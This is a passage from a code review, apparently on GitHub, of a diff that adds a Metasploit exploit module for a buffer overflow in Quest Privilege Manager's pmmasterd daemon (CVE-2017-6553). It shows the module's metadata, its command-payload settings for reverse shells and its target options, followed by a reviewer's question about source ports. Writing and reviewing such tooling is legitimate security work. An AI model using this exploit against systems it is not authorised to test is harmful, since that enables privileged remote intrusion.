modules/exploits/linux/misc/quest_pmmasterd_bof.rb

```diff
@@ -0,0 +1,203 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Quest Privilege Manager pmmasterd Buffer Overflow',
+      'Description'    => %q{
+        This modules exploits a buffer overflow in the Quest Privilege Manager,
+        a software used to integrate Active Directory with Linux and Unix systems.
+        The vulnerability exists in the pmmasterd daemon, and can only triggered when
+        the host has been configured as a policy server ( Privilege Manager for Unix
+        or Quest Sudo Plugin). A buffer overflow condition exists when handling
+        requests of type ACT_ALERT_EVENT, where the size of a memcpy can be
+        controlled by the attacker. This module only works against version < 6.0.0-27.
+        Versions up to 6.0.0-50 are also vulnerable, but not supported by this module (a stack cookie bypass is required).
+      },
+      'Author'         =>
+        [
+          'm0t'
+        ],
+      'References'     =>
+        [
+          ['CVE', '2017-6553'],
+          ['URL' , 'https://0xdeadface.wordpress.com/2017/04/07/multiple-vulnerabilities-in-quest-privilege-manager-6-0-0-xx-cve-2017-6553-cve-2017-6554/']
+        ],
+      'Payload'        =>
+        {
+          'BadChars'    => "",
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic python perl ruby openssl bash-tcp'
+            }
+        },
+      'Arch'           => ARCH_CMD,
+      'Platform'       => 'unix',
+      'Targets'        =>
+        [
+          ['Quest Privilege Manager pmmasterd 6.0.0-27 x64',
+            {
+              :exploit => :exploit_x64,
+              :check => :check_x64
+            }
+          ],
+          ['Quest Privilege Manager pmmasterd 6.0.0-27 x86',
+            {
+              :exploit => :exploit_x86,
+              :check => :check_x86
+            }
+          ]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Apr 09 2017',
+      'DefaultTarget'  => 1
+      ))
+
+    register_options([ Opt::RPORT(12345) ], self.class)
+    register_options( [ Opt::CPORT(rand(1024))], self.class )
```

Comment:
Is this necessary for exploitation? Setting the source port to a privileged port requires root.